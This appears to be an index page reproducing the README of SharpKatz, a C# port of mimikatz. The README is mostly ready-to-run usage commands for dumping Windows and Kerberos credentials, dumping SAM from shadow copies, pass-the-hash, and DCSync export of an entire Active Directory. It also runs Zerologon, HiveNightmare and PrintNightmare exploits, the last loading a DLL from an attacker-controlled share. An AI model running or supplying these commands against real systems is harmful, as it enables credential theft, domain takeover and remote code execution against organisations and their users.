Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/b4rtik/SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
https://github.com/b4rtik/SharpKatz
Last synced: about 2 months ago
JSON representation
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- Host: GitHub
- URL: https://github.com/b4rtik/SharpKatz
- Owner: b4rtik
- Created: 2020-05-19T17:56:46.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-11-07T21:29:22.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:25:17.434Z (5 months ago)
- Language: C#
- Homepage:
- Size: 608 KB
- Stars: 950
- Watchers: 26
- Forks: 133
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - b4rtik/SharpKatz - Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands (C# #)
README
# SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands## Usage
### Ekeys
```SharpKatz.exe --Command ekeys```
list Kerberos encryption keys
### Msv
```SharpKatz.exe --Command msv```
Retrive user credentials from Msv provider
### Kerberos
```SharpKatz.exe --Command kerberos```
Retrive user credentials from Kerberos provider
### Tspkg
```SharpKatz.exe --Command tspkg```
Retrive user credentials from Tspkg provider
### Credman
```SharpKatz.exe --Command credman```
Retrive user credentials from Credman provider
### WDigest
```SharpKatz.exe --Command wdigest```
Retrive user credentials from WDigest provider
### Logonpasswords
```SharpKatz.exe --Command logonpasswords```
Retrive user credentials from all providers
### List shadowcopies
```SharpKatz.exe --Command listshadows```
Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject
### Lsadumpsam
```SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM```
Dump credential from provided sam database
### Pth
```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password
```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```
Perform pth to create a process under userdomain\username credential user's rc4 key
```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```
Replace ntlm hash for an existing logonsession
```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key
### DCSync
```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```
Dump user credential by username
```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```
Dump user credential by GUID
```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```
Export the entire dataset from AD to a file created in the current user's temp forder
```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Dump user credential by username using alternative credentials
```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Dump user credential by GUID using alternative credentials
```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials
### Zerologon
No reference to logoncli.dll, using the direct rpc call works even from a [non-domain joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929)
```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```
Perform Zerologon check
```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```
Perform Zerologon attack
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and dump user credential by username
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and dump user credential by GUID
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder
Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed [here](https://github.com/dirkjanm/CVE-2020-1472)### PrintNightmare CVE-2021-1675 - CVE-2021-34527
```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll```
Perform PrintNightmare attack
```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```
Perform PrintNightmare attack with provided credentials
### HiveNightmare CVE-2021-36934
```SharpKatz.exe --Command hiveghtmare```
Exploit HiveNightmare vulnerability selecting the first available shadowcopy
## Credits
This project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.
The analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).